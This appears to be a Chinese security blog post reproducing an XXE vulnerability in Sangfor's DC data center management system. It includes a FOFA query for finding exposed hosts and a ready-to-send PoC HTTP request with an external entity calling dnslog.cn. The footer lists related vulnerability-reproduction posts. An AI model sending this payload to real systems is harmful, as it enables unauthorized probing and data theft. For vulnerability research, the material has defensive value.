首页 > 其他分享 >漏洞复现-深信服DC数据中心管理系统 XXE漏洞

漏洞复现-深信服DC数据中心管理系统 XXE漏洞

时间:2023-08-16 17:35:23浏览次数:42  
标签:xml 数据中心 管理系统 信服 DC 漏洞 XXE

0x01产品简介

  深信服是数据中心管理系统是DC为AC饿外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件的组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。

0x02漏洞概述

  深信服是数据中心管理系统DC存在xml外部实体注入漏洞。由于后端对传入的xml对象进行了非预期内解析,攻击者可以利用该漏洞进行xml注入攻击,获取系统敏感信息。

0x03影响范围

  v6.1版本以下

0x04漏洞复现

  FOFA:"SANGFOR数据中心"

 

POC:

1

2

3

4

5

6

7

8

9

10

11

POST /src/sangforindex HTTP/1.1

Host: {{hostname}}

Content-Type: text/xml

 

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE root [

    <!ENTITY rootas SYSTEM "http://dnslog.cn">

]>

<xxx>

&rootas;

</xxx>

验证:

 

 

 

标签:xml,数据中心,管理系统,信服,DC,漏洞,XXE
From: https://www.cnblogs.com/1zzZ/p/17635721.html

相关文章

  • 漏洞复现-金蝶云星空任意文件读取
    0x01产品简介金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以“开放、标准、社交”三大特性为数字经济时代的企业提供开放的ERP云平台。服务涵盖:财务、供应链......
  • 漏洞复现-绿盟 NF下一代防火墙 任意文件上传漏洞
    漏洞描述:绿盟SSLVPN存在任意文件上传漏洞,攻击者通过发送特殊的请求包可以获取服务器权限,进行远程命令执行漏洞影响:绿盟SSLVPN网络测绘:app="NSFOCUS-下一代防火墙" 出现漏洞的端口为808112345678910POST/api/v1/device/bugsInfoHTTP......
  • 1分钟看懂:什么是0day、1day和nday漏洞?
    把应用系统比作是保险柜,假如保险柜破了一个洞,这个洞只有少数人知道,没有传播开来,也暂时没有补救的措施,那这个洞就是0day漏洞。也就是说,这个漏洞处于相对“未知”的状态,一旦被用来发起攻击的话,就会面临“没有补丁”的情况。而1day呢,就是有洞的问题已经被公开了,保险柜主人也正在组......
  • 漏洞复现-金蝶云星空任意文件读取
    0x01产品简介金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以“开放、标准、社交”三大特性为数字经济时代的企业提供开放的ERP云平台。服务涵盖:财务、供......
  • 漏洞复现-深信服DC数据中心管理系统 XML注入漏洞
    0x01产品简介深信服是数据中心管理系统是DC为AC饿外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件的组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。0x02漏洞概述深信服是数据中心管理系统DC存在xml外部实体注入漏洞。由于后端对传入的xml对象进......
  • 针对小程序的漏洞挖掘
    前言微信小程序默认是直接使用自己微信登陆的,我们对小程序的漏洞挖掘,关注点还是在逻辑漏洞上面,下面将从环境搭建到实例一步步讲解。环境配置工具:Burp+Fiddler+windows版本微信注:你也可以直接用burp+windows版微信,进行抓包,如果出现网络错误,直接用Fiddler抓包然后发给burp进行测试......
  • BOSHIDA DC电源模块高精度和稳定性的表现
    BOSHIDADC电源模块高精度和稳定性的表现DC电源模块作为电子产品中重要的组件之一,其生产用料的扎实程度对于产品性能和质量有着至关重要的影响。在DC电源模块生产过程中,一般需要使用高品质的电子元件和材料,以确保其性能和可靠性。 首先,DC电源模块生产所使用的电子元件需要具......
  • JimuReport v1.6.1版本发布,修复 Freemarker 模板注入高危漏洞
    1.6.12023-08-16更新#升级日志【漏洞通知】修复Freemarker注入漏洞,危害等级:高危描述:Freemarker模板注入导致远程命令执行,远程攻击者可利用该漏洞调用在系统上执行任意命令。Issues处理echarts提示框的位置问题#1630饼图数值显示问题#1814分组支持自定义中文排序......
  • 漏洞仓库
    漏洞触发url方法匹配词用途详情espcms_utf8_v5.7.13.08.15存在CSRFhttp://192.168.230.148/espcms/adminsoft/index.php?archive=membermain&action=membersavePOSTadminsoft/index.php?archive=membermain&action=membersave新增用户espcms_v5.7.13存在CSRF......
  • 文件上传漏洞
    webshell一句话木马eval($_POST['muma']);system函数可以执行操作系统的命令代码短,只有一行代码。场景多,可以单独生成文件,也可以插入到图片中。安全性高,隐藏性强,可变形免杀小马体积小,功能少,只有文件上传功能,为大马做铺垫。大马体积大,功能全,能够管理数据库、文件管理、对......